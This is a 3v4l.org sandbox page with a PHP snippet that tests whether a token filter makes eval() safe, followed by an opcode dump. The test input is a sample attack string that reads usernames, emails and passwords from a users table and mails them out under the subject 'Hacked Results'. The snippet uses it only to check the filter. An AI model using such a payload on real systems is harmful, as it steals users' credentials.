3v4l.org

run code in 300+ PHP versions simultaneously
<?php $input = '$result = $db->fetch_row($db->query(‘select id, username, email, password from users’)); $body = ‘’; foreach($result as $k => $v) { $body .= $v. “ =\t”. $k[$v].”\t”; } mail(‘myemail@gmail.com’, ‘Hacked Results’,$body);'; $tokens = token_get_all("<?php {$input}"); $expr = ''; foreach($tokens as $token){ if(is_string($token)){ if(in_array($token, array('(', ')', '+', '-', '/', '*'), true)) $expr .= $token; continue; } list($id, $text) = $token; if(in_array($id, array(T_DNUMBER, T_LNUMBER))) $expr .= $text; } eval("\$result = {$expr};"); print "\nexpr = " . $expr; print "\nres = " . $result; 
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 9, Position 2 = 29
Branch analysis from position: 9
2 jumps found. (Code = 78) Position 1 = 10, Position 2 = 29
Branch analysis from position: 10
2 jumps found. (Code = 43) Position 1 = 12, Position 2 = 16
Branch analysis from position: 12
2 jumps found. (Code = 43) Position 1 = 14, Position 2 = 15
Branch analysis from position: 14
1 jumps found. (Code = 42) Position 1 = 9
Branch analysis from position: 9
Branch analysis from position: 15
Branch analysis from position: 16
2 jumps found. (Code = 43) Position 1 = 27, Position 2 = 28
Branch analysis from position: 27
1 jumps found. (Code = 42) Position 1 = 9
Branch analysis from position: 9
Branch analysis from position: 28
Branch analysis from position: 29
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 29
filename:       /in/JXofT
function name:  (null)
number of ops:  39
compiled vars:  !0 = $input, !1 = $tokens, !2 = $expr, !3 = $token, !4 = $id, !5 = $text, !6 = $result
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   ASSIGN                                                   !0, '%24result+%3D+%24db-%3Efetch_row%28%24db-%3Equery%28%E2%80%98select+id%2C+username%2C+email%2C+password+from+users%E2%80%99%29%29%3B+%0A%24body+%3D+%E2%80%98%E2%80%99%3B%0Aforeach%28%24result+as+%24k+%3D%3E+%24v%29+%7B%0A++++%24body+.%3D+%24v.+%E2%80%9C+%3D%5Ct%E2%80%9D.+%24k%5B%24v%5D.%E2%80%9D%5Ct%E2%80%9D%3B%0A%7D%0Amail%28%E2%80%98myemail%40gmail.com%E2%80%99%2C+%E2%80%98Hacked+Results%E2%80%99%2C%24body%29%3B'
   10     1        INIT_FCALL                                               'token_get_all'
          2        NOP                                                      
          3        FAST_CONCAT                                      ~8      '%3C%3Fphp+', !0
          4        SEND_VAL                                                 ~8
          5        DO_ICALL                                         $9      
          6        ASSIGN                                                   !1, $9
   11     7        ASSIGN                                                   !2, ''
   13     8      > FE_RESET_R                                       $12     !1, ->29
          9    > > FE_FETCH_R                                               $12, !3, ->29
   15    10    >   TYPE_CHECK                                   64          !3
         11      > JMPZ                                                     ~13, ->16
   17    12    >   IN_ARRAY                                                 !3, <array>
         13      > JMPZ                                                     ~14, ->15
   18    14    >   ASSIGN_OP                                     8          !2, !3
   20    15    > > JMP                                                      ->9
   23    16    >   QM_ASSIGN                                        ~16     !3
         17        FETCH_LIST_R                                     $17     ~16, 0
         18        ASSIGN                                                   !4, $17
         19        FETCH_LIST_R                                     $19     ~16, 1
         20        ASSIGN                                                   !5, $19
         21        FREE                                                     ~16
   25    22        INIT_FCALL                                               'in_array'
         23        SEND_VAR                                                 !4
         24        SEND_VAL                                                 <array>
         25        DO_ICALL                                         $21     
         26      > JMPZ                                                     $21, ->28
   26    27    >   ASSIGN_OP                                     8          !2, !5
   13    28    > > JMP                                                      ->9
         29    >   FE_FREE                                                  $12
   29    30        ROPE_INIT                                     3  ~24     '%24result+%3D+'
         31        ROPE_ADD                                      1  ~24     ~24, !2
         32        ROPE_END                                      2  ~23     ~24, '%3B'
         33        INCLUDE_OR_EVAL                                          ~23, EVAL
   31    34        CONCAT                                           ~27     '%0Aexpr+%3D+', !2
         35        ECHO                                                     ~27
   32    36        CONCAT                                           ~28     '%0Ares+%3D+', !6
         37        ECHO                                                     ~28
   33    38      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
149.35 ms | 1400 KiB | 17 Q